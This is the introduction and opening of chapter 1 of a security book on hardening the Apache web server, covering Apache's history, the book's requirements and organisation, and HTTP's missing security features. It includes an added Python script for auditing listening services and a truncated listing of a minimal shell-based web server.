Introduction


Welcome to Maximum Apache Security. This introduction addresses the following
topics:

• Why did I write this book?
• What this book will tell you
• System requirements
• This book’s organization


Why Did I Write This Book? 


The Maximum Security series, which debuted in 1997, has thus far enjoyed relative 
success. I use the term “relative success,” because security title sales have historically 
trickled, rather than gushed. For altering this and fostering a new market, Sams 
editors deserve kudos. Their insights have proven providential: Today, Maximum 
Security titles sell in five countries, five languages, and on four continents. 
Furthermore, the Maximum Security series inspired many fine similarly oriented 
books from seasoned security professionals here and abroad. 


The Maximum Security series’ success is no mystery. Security has never before been so 
sensitive an issue, nor an issue so vital to business. Many firms have now evolved 
well beyond mere Web presences, and today incorporate sophisticated e-commerce 
functionality into their systems. These developments increased demand for books 
that help administrators shield their enterprises from crackers, and earlier Maximum 
Security titles did—in varying degrees—satisfy that need. 


NOTE

Recent events—including the September 11, 2001 tragedy in the U.S.—persuaded even the
U.S. government to reassess its security posture. Our Homeland Security chief, Tom Ridge,
recently elicited private sector proposals on GovNet, a new Internet-within-the-Internet that
will partition sensitive government data from public view. (I'll momentarily stay my opinion
on GovNet, but you haven’t heard the last of it.) Check out Ridge’s proposal, titled Request for
Information for a Government Network Designed to Serve Critical Government Functions
(GOVNET), at http://www.fts.gsa.gov/govnet/govnet.doc. (Note that this link triggers an
immediate download of a Microsoft Word document.)







So, the need for up-to-date security titles is now well established, and the Maximum
Security series was a groundbreaker in this field. That was our good fortune. However,
we launched our series with a wide scope—a scope too wide, in retrospect. Early
Maximum Security titles addressed diverse topics, sometimes without providing
sufficient depth on any single topic to make a purchase worthwhile (if you only used
Mac OS, for example, a general Maximum Security title might have been impractical
for you).


We therefore switched our strategy and instead developed books that examined 
particular operating systems or applications in greater depth and specificity. To this 
new development—series title specialization—user response was overwhelmingly 
positive. This was also happy news to Sams (and me), but presented another 
problem: after Maximum Linux Security and Maximum Windows 2000 Security, where 
would we go next? 


Enter Apache Web Server. 


Why Apache Web Server? 


Choosing Apache Web Server was a no-brainer. Apache is as much a fixture in
ancient Internet lore as Mosaic, Navigator, Linux, and Peter Tattam’s Trumpet
Winsock (aka tcpman.exe, an early shareware TCP/IP stack for Windows 3.x). To
belabor that point, I'll take you on a brief ride in the way-back machine.


The year was 1994. Some highlights from the time: on January 17, Los Angeles
abruptly awoke to a 6.7 magnitude earthquake that devastated the San Fernando
Valley. In June, police arrested O.J. Simpson for the murders of his ex-wife, Nicole
Brown Simpson, and Ronald Goldman. Sheryl Crow had a hit song (“All I Wanna Do”),
Republicans regained control of Congress, and Tom Hanks won an Oscar for Forrest Gump.


Internet demographics were then impossible to accurately measure (and researchers
relied strictly on dedicated server statistics), but usage grew quickly. Mosaic’s release
just one year earlier gave ordinary mortals easy World Wide Web access with a
convenient graphical user interface, instead of a Unix or VMS CLI. The Net even
became popular enough to persuade White House staffers that the time had come:
henceforth, you could surf to www.whitehouse.gov and find yourself confronted with
the message “Welcome to the White House.”


At roughly the same time that O.J. made his notorious Bronco run, Rob McCool was 
wrapping up his tenure at the National Center for Supercomputing Applications at 
the University of Illinois, Urbana-Champaign. McCool, over several years, authored 
and refined NCSA HTTPd, a public-domain server. NCSA HTTPd’s popularity grew 
almost as quickly as its functionality. By mid-1994, it was the world’s most well 
known and most used free Web server. 




NOTE 


To get NCSA’s server and fiddle with the source code, go to
http://hoohoo.ncsa.uiuc.edu/docs/Overview.html.





McCool’s HTTPd was so popular that independent developers worldwide began 
writing extensions for it. However, the summer of 1994 marked a major change for 
HTTPd and Mr. McCool, who migrated to greener pastures. This left thousands of 
Webmasters without support or a common distribution that incorporated the new 
extensions. 


It was then that the original Apache team (Brian Behlendorf, Roy T. Fielding, Rob 
Hartill, David Robinson, Cliff Skolnick, Randy Terbush, Robert S. Thau, and Andrew 
Wilson) took the initiative and carried forward McCool’s research. (Eric Hagberg, 
Frank Peters, and Nicolas Pioch would later follow.) 


These men—using NCSA HTTPd 1.3 as a baseline—patched known bugs, incorporated
the aforementioned extensions, and in April 1995 released Apache 0.6.2. That
was, as of this writing, roughly six years and 100 million Internet users ago. Since
then, Apache has become Earth’s number one free WWW server. A January 2002
NetCraft survey clocked Apache as commanding 58.7% of the Web server market.


NOTE 


The study that placed Microsoft IIS with 30.25% of the market is available at
http://www.netcraft.com/survey/.





Now, here’s a fact: From that day to this, no book ever emerged that focused
exclusively on Apache security. Many fine titles did emerge, however, in varying
categories, including administration, development, and so on. (The best Apache book in
any category in my opinion is Ben Laurie’s Apache: The Definitive Guide, from O’Reilly
and Associates.) For this reason alone, we saw Apache security as an inviting subject.


More than this, however, many conditions suggested that it was time for Maximum 
Apache Security. 


For example: 


• Apache is one of only two free Web servers that run on so wide a range of
  operating systems, so an Apache security book would benefit many users, not
  merely a limited class. Today, Apache runs on Unix, Windows, Amiga, OS/2,
  and even BeOS. The other Web server in this privileged class is the World Wide
  Web Consortium’s Jigsaw, but Jigsaw runs in Java (not all shops support Java),
  and also lacks Apache’s history and popularity. Check out Jigsaw at
  http://www.w3.org/Jigsaw/.

• Additionally, Apache closely interacts with many CGI and scripting language-
  to-database configurations (for example, PHP to MySQL), and is now the
  preferred choice for pilot projects and proof-of-concept research. No one uses
  Solaris and Oracle to test a speculative enterprise—it’s just too costly a
  proposition. Enterprises engaging in such projects need security, too, and would
  welcome an Apache security title.

• Apache version 2.0, which is new, includes many security enhancements and
  IPv6 support. A need for hard copy documentation on these changes exists,
  and I aim to fill it.

• Many open source enthusiasts favor Apache, but often search multiple sources
  to find comprehensive security and development references. Books that address
  these issues—and thus put such information at developers’ fingertips—may
  speed Apache’s development and evolution.


For these reasons—and because I’m an avid Apache supporter—I agreed to write this 
book. 


What This Book Will Tell You 


This book differs from general Apache administration titles. I wrote it with the 
assumption that you’ve installed Apache at least once on some operating system. 
Maximum Apache Security is, therefore, not a how-to-install Apache book. Rather, it 
focuses on security. 


This doesn’t mean that I flatly abandon configuration issues. Apache often requires 
you to perform actions or set options at compilation or startup that materially affect 
system security. When such issues arise, I cover them. However, I wrote this book 
more to familiarize you with Apache’s security features, how to enable them, and 
how to use them to protect your server. 


As my previous co-authors and I have often reiterated, remote attacks rely on local
holes: flaws in code that is running and listening on the host, which hand remote
users access or a privilege escalation. A cracker can only gain such access by first
exploiting a running service. The fewer services you run, the less likely it is that
crackers will penetrate your system. This is why security folks obsess over what
services run, which of them are nonessential, and so forth.
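The check that principle implies, written here as an added example rather than anything from the book: enumerate what is actually listening on the host and flag every service that is reachable from the network but not on a short allowlist of essentials. The code assumes the Linux /proc/net/tcp layout (hexadecimal host-order address:port, state 0A for LISTEN); the table embedded in it is constructed for the demonstration, not captured from a real machine. Services bound only to 127.0.0.1 are reported separately, since they are not exposed to remote users.

```python
"""Audit listening TCP services against an allowlist.

Added example, not code from the book.  Assumes the Linux /proc/net/tcp
format; on another platform you would feed the equivalent tool's output in.
"""
import socket
import struct

LISTEN_STATE = "0A"  # TCP_LISTEN as printed in /proc/net/tcp

# Constructed sample of /proc/net/tcp (not from a real host): an HTTP server
# on all interfaces, MySQL on loopback only, an FTP daemon on all interfaces,
# and one established HTTP connection (state 01) that must be ignored.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0050 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0
   1: 0100007F:0CEA 00000000:0000 0A 00000000:00000000 00:00000000 00000000   105        0 12346 1 0000000000000000 100 0 0 10 0
   2: 00000000:0015 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12347 1 0000000000000000 100 0 0 10 0
   3: 0200000A:0050 0100000A:C3B4 01 00000000:00000000 00:00000000 00000000     0        0 12348 1 0000000000000000 100 0 0 10 0
"""


def _decode_address(field):
    """Turn '0100007F:0CEA' into ('127.0.0.1', 3306).

    The kernel prints the IPv4 address as a 32-bit integer in host byte
    order, so on little-endian hardware the octets appear reversed."""
    ip_hex, port_hex = field.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def listening_sockets(proc_net_tcp):
    """Return [(ip, port, uid), ...] for every socket in LISTEN state."""
    result = []
    for line in proc_net_tcp.splitlines()[1:]:  # skip the column header
        fields = line.split()
        if len(fields) < 8 or fields[3] != LISTEN_STATE:
            continue
        ip, port = _decode_address(fields[1])
        result.append((ip, port, int(fields[7])))
    return result


def audit_services(proc_net_tcp, allowed_ports):
    """Split listeners into allowed, loopback-only, and unexpected.

    'unexpected' is the list that matters: network-reachable services that
    nobody signed off on, each one a candidate remote foothold."""
    report = {"allowed": [], "loopback_only": [], "unexpected": []}
    for ip, port, uid in listening_sockets(proc_net_tcp):
        if port in allowed_ports:
            report["allowed"].append((ip, port, uid))
        elif ip.startswith("127."):
            report["loopback_only"].append((ip, port, uid))
        else:
            report["unexpected"].append((ip, port, uid))
    return report


if __name__ == "__main__":
    import sys
    # Use the live table when running on Linux, the constructed sample otherwise.
    try:
        with open("/proc/net/tcp") as fh:
            table = fh.read()
    except OSError:
        table = SAMPLE_PROC_NET_TCP
    report = audit_services(table, allowed_ports={80, 443})
    for kind in ("unexpected", "loopback_only", "allowed"):
        for ip, port, uid in report[kind]:
            print(f"{kind:14} {ip}:{port} (uid {uid})")
    sys.exit(1 if report["unexpected"] else 0)
```

Run on the sample, the FTP listener on port 21 is the only entry under "unexpected"; the loopback-bound MySQL socket is listed but not flagged, because the remote attacker the paragraph worries about cannot reach it. The exit status makes the script usable as a nightly check on a real host.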


Web services remain—for most of us—essential. Perhaps only mail services are more
common or mission-critical. Crackers thus concentrate on cracking Web servers,
because they’re there, and they’re often wide open to attack. Tagging (defacement),
where crackers penetrate Web servers and replace their home pages with obnoxious or
political messages, is now commonplace. Such mishaps arise because Webmasters often
fail to properly configure or secure their servers. So, this book does cover
configuration issues on occasion.


System Requirements 
This section addresses what hardware, software, and documentation you'll need to
reap the maximum benefit from this book. I divided these into four sections:

• Absolute requirements—Things you must have

• Archiving tools—Tools to unpack source code, archives, and packages that can
  enhance and secure your Apache server

• Text and typesetting viewers—Tools that will enhance and widen your Apache
  knowledge by enabling you to read relevant online documents

• Programming languages—Tools to utilize source code, packages, and utilities
  that enhance Apache’s security and functionality


Absolute Requirements 


To benefit from this book, you'll need the following, at a minimum:

• An Apache Web Server distribution (1.3 or higher)
• Unix, Linux, Windows, Amiga, OS/2, or BeOS
• A dedicated box running one of the aforementioned platforms
• A network or Ethernet connection


Your network or Ethernet connection is not a strict requirement (you can use the
loopback interface), but without it you won’t be able to try some of the cross-host
or attack examples. However, Apache runs on your box as a daemon, and thus enables
you to simulate many conditions and configurations that would normally exist only
on the Internet or in intranet environments. Indeed, Apache answers client requests
from localhost if you address them to http://127.0.0.1/. Thus, even on a single
machine not connected to a network, Apache provides you with a microcosmic
version of the WWW, and this, for the most part, should suffice.


Archiving Tools 


You'll also need wide document and file utility support. This book points you to
many Net-based resources, and even now, not all Web sites or researchers provide
documents in a standardized format (though Adobe’s Portable Document Format
(PDF) seems to be rapidly filling that gap).

Also, many utilities, source code, and packages originate from disparate platforms.
Some are compressed on Unix, some are packaged on Windows, and so forth.
Therefore, you should have at least the tools mentioned in Table I.1.


TABLE I.1 Popular Archive Utilities

Utility   Platform    Description and Location

Winzip    Windows     Winzip decompresses files compressed to ARC, ARJ, BinHex, gzip,
                      LZH, MIME, TAR, Unix compress, and Uuencode archives. Winzip is
                      available at http://www.winzip.com/.

gunzip    Unix        gunzip unpacks files compressed with gzip or compress.

tar       Unix        tar unpacks tar archives made on Unix systems.

StuffIt   Macintosh   StuffIt decompresses ARC, ARJ, BinHex, gzip, MacBinary, StuffIt,
                      Uuencoded, and ZIP archives. StuffIt is available at
                      http://www.aladdinsys.com/expander/index.html.


Text and Typesetting Viewers 


Many commercial word processors and editors read and write data to proprietary 
formats. Plain text viewers seldom read such formats, which often contain control 
characters, unprintable characters, and sometimes even machine language. Although 
this situation is changing because most text and word processors are now migrating 
to XML, many documents I reference are not backward compatible or don’t open 
cleanly in plain text viewers. Thus, you’ll need one or more readers to examine 
them. 


NOTE 


Readers decode documents written in formats unsupported by your native application set. For 
example, Adobe’s free PDF reader enables you to read PDF documents, and Microsoft’s Word 
Viewer enables users that don’t own Word to read Word-encoded documents. 


Table I.2 lists several such utilities and where they can be found. 


TABLE I.2 Readers for Popular Word Processing Formats

Reader             Description and Location

Adobe Acrobat      Adobe Acrobat Reader decodes Portable Document Format files.
                   Acrobat Reader is available for DOS, Windows, Windows 95,
                   Windows NT, Unix, Macintosh, and OS/2. Get it here:
                   http://www.adobe.com/supportservice/custsupport/download.html.

GSView             GSView reads PostScript and Ghostscript files. GSView is available
                   for OS/2, Windows 3.11, Windows 95, and Windows NT. Get it at
                   http://www.cs.wisc.edu/~ghost/gsview/index.html.

Word Viewer        Word Viewer reads Microsoft Word files. Word Viewer is available
                   for Windows (16-bit) and Windows 95/NT. You can get either version
                   at http://office.microsoft.com/downloads/9798/wdvw9716.aspx.

PowerPoint Viewer  PowerPoint Viewer decodes Microsoft PowerPoint presentations.
                   PowerPoint Viewer is available at
                   http://office.microsoft.com/downloads/9798/ppview97.aspx.





Programming Languages 


Some examples in this book reference source code. Apache supports or interfaces 
with many programming languages. To use the source code in this book, you'll need 
one or more compilers or interpreters. Table I.3 lists these languages and tools. 


TABLE I.3 Compilers and Interpreters

Tool        Description and Location

C and C++   The Free Software Foundation offers free C/C++ compilers (GCC) for both
            Unix and DOS. The Unix version can be downloaded at
            http://www.gnu.org/software/gcc/gcc.html. The DOS version (DJGPP) can be
            downloaded at http://www.delorie.com/djgpp/. Also, any recently released
            native or third-party C/C++ compiler will do, including Cygwin, Watcom,
            Borland, and so on.

Perl        The Practical Extraction and Report Language (Perl) is often used in
            network programming, especially Common Gateway Interface programming.
            Perl runs on Unix, Macintosh, and Windows NT, and is freely available at
            http://www.perl.com/.

Java        Java, a Sun Microsystems programming language, is free and available at
            http://java.sun.com/.

JavaScript  JavaScript is a language embedded in Microsoft Internet Explorer,
            Netscape Navigator, and many other Web clients. To use JavaScript
            scripts, you should have Microsoft Internet Explorer, Netscape Navigator,
            or Netscape Communicator. These are free for noncommercial use, and are
            available at http://www.microsoft.com or http://home.netscape.com.

PHP         PHP, the hypertext preprocessor, is a lightweight but powerful in-line
            scripting language that interfaces through Apache to MySQL and other
            database packages. If you don’t already have it, get PHP here:
            http://www.php.net.

Python      Python is an object-oriented scripting language now commonly used in
            system administration and CGI work. It, too, interfaces with Apache.
            Only a few examples in this book use Python, but to try these, you'll
            need a Python interpreter. Get one at http://www.python.org/.

SQL         Structured Query Language is for interacting with databases. SQL is not
            strictly required for this book. However, even a shallow knowledge of
            SQL might help, because some examples briefly touch on it. For this,
            you needn’t obtain any particular utility, but rather an introductory
            primer (book, Web site, and so on) for reference purposes.

VBScript    VBScript is a Microsoft scripting language that manipulates Web browser
            environments. VBScript and VBScript documentation are freely available
            here: http://msdn.microsoft.com/scripting/vbscript/default.htm.





NOTE 


If the comments on programming languages seem intimidating, have no fear. This book will
explain everything necessary to use the examples herein. As I relate in upcoming sections, you
needn't be a programmer nor ever write a line of code to use this book.





This Book’s Organization 


While authoring, editing, or contributing to 19 computer science titles, I had the 
opportunity to make every organizational mistake an author can make—and I did, 
many times over. But mistakes are merely invitations to strive harder, learn more, 
and master one’s craft. In Maximum Apache Security, my hard-earned, hard-knock 
knowledge helped me build what I deem an excellent resource. I hope you'll agree. 


General Organization 


To begin, we’ll take a wide view, examining book, part, chapter, and section
structure, and cross-referencing. Before we start, though, we'll first address a more
fundamental issue: just what type of book did you purchase?


What Kind of Book Is This? 
Before they pen even a single line, computer authors first establish the type of book 
they’re writing. In the widest sense, they have three choices: 


• The developmental title—Here authors introduce readers to simple concepts
  and as the chapters move on, the subject matter grows progressively more
  advanced. Sams dominates the developmental market with titles that teach you
  anything in 21 days, 24 hours, and so forth.

• The hard reference title—Here authors scrupulously document a language API
  or other structured standard that periodically changes, and thus requires
  annual updates. Such titles resemble dictionaries or encyclopedias. Users dig
  them up chiefly when they’ve forgotten what a C declaration, HTML tag, or
  Java class does. These are among the most lucrative titles from a
  time-investment versus financial-return viewpoint, largely because their shelf
  life is indefinite.

• The textbook—Here authors narrowly focus on a specialized subject (sockets,
  for example). Textbook authors meticulously lecture on conventions,
  standards, and styles that, sadly, few programmers use in practice. Finally,
  textbook authors lay out networking subjects step-by-step, session-by-session,
  and packet-by-packet, until at last their students can develop a full-fledged
  network application—usually with snippets of source code included in their
  textbook or course syllabus.


Most authors wisely choose just one book type and stick to it, thus reverently 
observing established computer publishing industry standards. I’m a hardheaded 
fellow, though. I go against the grain and try new things. Sometimes, these new 
things work beautifully. Sometimes, they don’t work at all. Maximum Apache Security 
touts my latest approach; one that incorporates subtle advantages that I believe will 
render your experience an enlightening and informative one. 


This book is unique in several ways, but one in particular stands out: Maximum 
Apache Security falls squarely between the classic developmental and reference title 
book types. To demonstrate how this works, I’ll briefly compare the two approaches, 
how they can work in concert, and the benefits you’ll reap from the hybrid you’ve 
purchased. 


Developmental Books and Maximum Apache Security 
Developmental titles progress precisely as their name would suggest: gradually, 
methodically, and in a soup-to-nuts fashion. Figure I.1 illustrates this graphically. 


[Figure I.1 shows "A Typical Developmental-Oriented Book Structure: Part I" as five
stages, left to right: (1) welcome, author notes, introduction, how to use the book,
what the chapters ahead discuss; (2) detailed coverage of the OS, system, or
technology in discussion (RFCs abound); (3) installation and configuration, options,
third-party support and apps; (4) advanced topics, programming, deep configuration,
and administration; (5) reference material.]

FIGURE I.1 How developmental books progress.
Developmental titles proceed as if you just purchased the featured system or
application and you’re ready to install it for the first time. They then methodically
cover key issues such as installation, configuration, runtime options, and so forth.


The developmental technique is an excellent instructional approach, for it follows
logical and linear paths that most folks follow when studying a subject. Authors
generally break down such developmental books in parts or sections, and each
section addresses wide concepts. Authors order such sections or parts in a
developmental way, too, starting with newbie information. Please see Figure I.2.


[Figure I.2 shows "A Typical Developmental-Oriented Book Structure: Part II": a
typical section or part, broken into chapter groups, left to right. Introductory
chapters: welcome, author notes, introduction, how to use the book, what the
chapters ahead discuss (tells the student what she'll learn and how great the book
is). Core chapters: detailed coverage of the OS, system, or technology in discussion,
RFCs abound (explains the core technology under discussion; slightly more technical,
but not intimidating). Installation chapters: installation and configuration,
options, third-party support and apps. Advanced chapters: advanced topics,
programming, deep configuration, and administration. Appendices: reference material.]

FIGURE I.2 A typical introductory part or section.


This method, to which Maximum Apache Security fundamentally adheres, works like 
modern novel structure does. You can read a bit—a few paragraphs or even a chapter 
if you like—and put down the book. At some later point, after you’ve mastered what 
you've learned, you can start reading again and learn more. Chapters in such titles 
are standalone and self-contained elements. 


Reference Books, Structure, and Form 

Reference works don’t include much commentary, really. Instead, they focus on hard
facts, syntax, standards, structures, coding style, and error checking. Because this
doesn’t require friendly discussion with the reader, such works proceed in a
more-or-less austere manner, and their authors organize material in the most
practical possible manner. Generally, this organization is either alphabetical, or is
grouped by related functions, classes, and so on. Figure I.3 illustrates this structure.




[Figure I.3 shows "The Structure of a Typical Reference-Related Title": entries are
generally organized in alphabetical order, and treatment tends to be brief, showing
either basic syntax (without hard examples) or flat facts about the specified
technology. Two sample entries: "%{env_variable}e: the %e LogFormat format string
logs the contents of the named environment variable. See also: environment
variables." and "%b: the %b LogFormat format string records the total number of
bytes sent, not including headers. See also: logging."]

FIGURE I.3 A typical reference title structure.


As I earlier related, Maximum Apache Security is a hybrid of both approaches. Let’s 
look at how I accomplished that. 


Maximum Apache Security's Developmental Features 


Transparently, this book is a typical developmental title and adheres in every way to 
traditional developmental structure. Figure I.4 illustrates how I diced and sliced it. 
FIGURE I.4 Maximum Apache Security’s developmental structure.
Nested within this developmental structure, however, I created a more reference-
oriented title. Maximum Apache Security's cross-referencing, in particular, is tight. Let’s
cover how it works.


Maximum Apache Security and Cross-Referencing 
There are two types of cross-references in this book:

• Internal cross-references—Cross-references that interrelate concepts, data, or
  other important information that lies within these pages

• External cross-references—Cross-references that interrelate concepts, data, or
  other important information in this book with additional supplemental data
  available elsewhere


The internal cross-references work like this:

• All references to Apache source code, unless otherwise noted, relate to version
  2.0. The order of code cross-references is [application or module], [directory],
  [filename], [function], [line number].

• Internal cross-references by subject are ordered in the following manner:
  [explanation of what the cross-referenced material is], [chapter, appendix, or
  glossary], [section].

External cross-references are formatted as follows: [title], [document or resource
type], [short description of contents], [credits], [data type], and [locale]. And, to
ensure easy access to all such external references, a file named references.html on
the accompanying CD-ROM contains links, organized by chapter, appendix, and glossary.


Part, Chapter, and Section Structure 


When publishers contract you to author a book, they first demand a table of 
contents and book outline. This provides, for editors and authors both, a road map 
of the book’s structure. Typically, this entails each chapter’s name and the issues 
you'll cover in it. Beyond this, editors and publishers leave a book’s organization to 
its author. 


If the author does her job well, editors can quickly and skillfully create a good book. 
Conversely, if the author communicates her thoughts in a consistently disorganized 
manner, even an editor’s best efforts cannot save the book. Unfortunately, economic 
realities lord over the publishing industry (as they do over all industries), and thus 
publishers are sometimes forced to print bad books anyhow. I’ve written a few bad 
ones myself, but this isn’t one of them. 


Parts, chapters, and sections of this book all conform to the pyramid principle
common to journalism. In each, I begin with an introduction or overview of what’s
to come and then work outward, covering the subject in ever-greater detail. Hence, if
you're searching for the nitty-gritty, find the section that holds the desired
information, and thumb to its end. There, you'll find tables containing command-line
and configuration options, directives, declarations, and so forth.


About Examples in This Book 


If you’re like me, you buy computer titles for their examples. Often, such examples
instruct you to execute a command or compile source code. It is by such examples
and exercises—even more than by attending formal classes—that we learn to
administer our systems, achieve competence in various technologies, and write solid
code.


Unfortunately, many computer titles contain examples that for one or another 
reason don’t enlighten us, or worse, don’t work properly. 


Some familiar scenarios: 


• Authors sometimes demonstrate a command, but include only its abbreviated
  output. They omit additional output, including unexpected output, errors, and
  so on. Books that omit such data leave you stranded when things go wrong.
  You’re unfamiliar with the unexpected output, and you don’t know how to
  proceed.

• Authors also sometimes generate examples on custom platforms and
  configurations, using custom tools. They might use shared libraries, for example,
  that you haven't yet installed, or those that your operating system doesn’t
  natively support. If authors fail to warn you about these conditions, you might
  encounter unexpected or negative results.

• Other authors, faced with crucial, impending deadlines, work in haste, and
  sometimes fail to double check that their examples work as intended. Although
  most such authors have excellent technical editors charged with nixing
  unacceptable code, such errors can still slip through to printed editions. (This
  is especially so when multiple authors and/or editors work on the same title.)

• Finally, many authors assume that their readers have experience in advanced
  subjects (such as compilation), and therefore skip details which, when absent,
  can materially affect your project (or even flatly prevent you from achieving
  the desired result).


Publishers invariably correct these issues by posting errata and patch code on their 
Web sites. However, these corrections emerge weeks or months after the title’s initial 
release. In the interim, readers angrily voice their complaints on Amazon, in news- 
groups, and other public places—and rightly so. Computer titles are expensive, after 
all, and at a minimum their examples should work as promised. 
Hence, starting with Maximum Linux Security, I took a fastidious approach to
examples and program output:

• If an example worked only on exotic configurations, I omitted it.

• If, when testing a program, utility, or configuration, I found that it behaved
  strangely or in an unintended manner, I omitted it.

• When documenting examples, I often include exhaustive output. This isn’t to
  seed the book with superfluous filler (and by doing so, raise the page count,
  and therefore the price). Rather, I do it to ensure that what you see herein is
  precisely what you'll see when you implement an example. My aim is to show
  you exactly what to expect. If your output differs from mine, an abnormal
  condition arose. And, more times than not, if you skip ahead a paragraph or
  two beyond the example, I explain possible alternative output and its likely
  reasons.


This approach guarantees that some examples and their accompanying commentary 
will seem inordinately verbose. However, it also guarantees that this book will give 
you a more holistic understanding of Apache security than most others in its class. 
Indeed, after reading this book, Apache’s errors, output, or behavior will never again 
perplex you. You’ll proceed competently, armed with implacable confidence. 


About Links and References in This Book 


Like all Maximum Security titles, Maximum Apache Security provides many links to 
online resources. I include such resources for practical reasons. 


First, no book can impart everything about a given subject. Rather, books at best
offer an overview, point you in the proper direction, and give you hands-on
experience through examples. But in IT—a rapidly evolving field in which you must
constantly update your skill set—even these generous gifts are insufficient. Today’s
computer books must do more than merely explain technologies; they must serve as
springboards that not only inform you but also inspire and enable you to conduct
further independent research.


Scholars of antiquity marginally achieved this by including in their works plain text 
bibliographies or suggested reading lists. They left the additional research to you, of 
course, which often entailed you hunting down rare manuscripts at universities on 
interlibrary loan. We’re lucky that the WWW exists today, for it renders this process 
interactive and immediate. 


Also, after you ace installation or configuration of a given operating system or application, you’re ready to move on. If the application is extensible, you’ll want to extend it; if it needs a patch, you’ll want to patch it; if other tools collaborate with it, you’ll want these, too.
Finally, today, time is money. Each time that you spend an hour or more searching for an online tool, advisory, or article, you lose money (not to mention precious minutes of life). In the meantime, you could be doing something else, something productive. Maximum Security titles provide innumerable pointers at your fingertips and alleviate the need for you to search for anything. This saves you time, money, and aggravation.


So, I always include in my titles long resource lists pertaining to the subject matter. 
Thus, my titles serve not merely as treatises, but also as references and road maps to 
detailed information located elsewhere. 


Some facts about this book’s links: 


• In earlier works, I pointed directly to binary files. When you enter such links in your browser, download immediately ensues. This was a mistake, for several reasons. First, filenames can change, such as when developers release updates and name their files by version number. Second, some sites post errata or other information you should read before downloading. Third, some sites request (but don’t strictly require) that you register before download. Finally, Webmasters frequently rearrange their directory structures, and thus a valid binary link today could be invalid tomorrow. So, I provide WWW or FTP links that store the resource and offer a link to it (rather than pointing to the file’s hard link).


• The Sams editorial team and I took exhaustive measures to ensure that this book’s links were valid at press time. This doesn’t mean that every link will be valid, though. The WWW is dynamic, documents move, some Webmasters are flaky, and some ISPs fold. Hence, it’s likely that one to three percent of the URLs I reference in Maximum Apache Security will be invalid by the time you read this. Regrettably, this is beyond our control. For this reason (and to reduce further the likelihood of you drowning in 404 errors), I provided at least one alternative URL for each link whenever possible.


• Regarding URLs built of CGI strings: Today, these strings can be incredibly long and inconvenient to enter manually. I approached this in two ways. First, if a document resided at such a URL, I used the filename to search for an alternative location, one with a shorter URL. Whenever possible, I provided the alternative URL instead. In cases where the 130-character CGI-based URL was the only source available, I added that URL to the long-urls.html file on the accompanying CD-ROM. Thus, when you surf URLs from this book, if you encounter an impossibly long one, throw in the CD, pull up the file, and click away.
• Regarding commercial, shareware, and freeware products I discuss in Maximum Apache Security: As in so many of my books, I point to hundreds (or sometimes, thousands) of applications, tools, and utilities. I often comment on these, too, sometimes praising their functionality and developers. However, I don’t endorse or review products, and I’m not affiliated with any of the products mentioned herein. Indeed, I don’t own tech stocks, I’m not in venture capital, I don’t write for magazines, I don’t receive free products, and thus I have no financial interest in any IT product’s success (except this book, of course). If I mention a product, I do so because it’s useful or because I generated examples with it. Having related that, I do thank vendors and developers that rendered technical support on their products. Their help was indispensable.


Summary 


Maximum Apache Security starts with general security issues common to any server, 
and ends with security issues relevant in hacking your own Apache modules. I hope 
you find it useful. 


PART I 
Getting Started 


IN THIS PART 


1 How Apache Handles Security 





1 
How Apache Handles Security 


IN THIS CHAPTER 


• Generic HTTP Security Considerations 


• Apache Security Facilities 


• Apache Extensibility 


• Things Apache Can’t Defend Against 


This chapter summarizes Apache’s security features and the issues we’ll cover in subsequent chapters.


Generic HTTP Security Considerations 


To illustrate Apache’s value from a security perspective, I’ll briefly cite HTTP’s design. This will show that the components that bare HTTP lacks are the very same components the Apache team incorporated in its work.


In RFC 1945, Tim Berners-Lee, along with R. Fielding and H. Frystyk, concisely defined Hypertext Transfer Protocol: 


Hypertext Transfer Protocol (HTTP) is an application-level protocol with the lightness and speed necessary for distributed, collaborative, hypermedia information systems. It is a generic, stateless, object-oriented protocol that can be used for many tasks, such as name servers and distributed object management systems, through extension of its request methods (commands). A feature of HTTP is the typing of data representation, allowing systems to be built independently of the data being transferred.
The terms application-level, generic, and stateless—along with other terms in RFC 1945—reveal that taken alone, HTTP lacks vital security features.


For example: 


• HTTP offers no encryption. Therefore, third parties can capture traffic between clients and servers. Sessions thus offer little or no privacy. 


• HTTP is stateless; it doesn’t store information on users and therefore, cannot verify a user’s identity. 


• HTTP provides no session authentication. Hence, it cannot determine whether an untrusted user hijacked the current session.


Do these shortcomings represent shoddy work by Berners-Lee? Hardly. Rather, they 
indicate merely that Berners-Lee accomplished his primary objective—to create a 
tool that physicists could use to share data. He left specific security considerations to 
developers that later implemented HTTP in their applications. 


Indeed, a Web server’s baseline function is solely this: to listen for and satisfy 
requests from remote Web clients for files or directories. Any application that 
performs this task (and in the balance, adheres to HTTP’s standard) is a Web server— 
even if it offers little or no security facilities. 


Nothing illustrates this better than tools like SH-HTTP, a Web server written in ash by 
grendel@vip.net.pl in Poland: 


#!/bin/ash

VERSION=0.1

NAME="ShellHTTPD"
DEFCONTENT="text/html"
DOCROOT=/usr/local/var/sh-www
DEFINDEX=index.html
LOGFILE=/usr/local/var/log/sh-httpd.log

# Append one Common Log Format-style line per request
log() {
   local REMOTE_HOST=$1
   local REFERRER=$2
   local CODE=$3
   local SIZE=$4

   echo "$REMOTE_HOST $REFERRER - [$REQ_DATE] \"${REQUEST}\" ${CODE} ${SIZE}" >> ${LOGFILE}
}

# Status line and fixed headers for a successful response
print_header() {
   echo -e "HTTP/1.0 200 OK\r"
   echo -e "Server: ${NAME}/${VERSION}\r"
   echo -e "Date: `date`\r"
}

# Send an error response with the given status code and text, then quit
print_error() {
   echo -e "HTTP/1.0 $1 $2\r"
   echo -e "Content-type: $DEFCONTENT\r"
   echo -e "Connection: close\r"
   echo -e "Date: `date`\r"
   echo -e "\r"
   echo -e "$2\r"
   exit 1
}

# Pick a Content-type from the file's extension
guess_content_type() {
   local FILE=$1
   local CONTENT

   case ${FILE##*.} in
      html) CONTENT=$DEFCONTENT ;;
      gz) CONTENT=application/x-gzip ;;
      *) CONTENT=application/octet-stream ;;
   esac

   echo -e "Content-type: $CONTENT"
}

# Serve the requested file from under DOCROOT
do_get() {
   local DIR
   local NURL
   local LEN

   if [ ! -d $DOCROOT ]; then
      log ${PEER} - 404 0
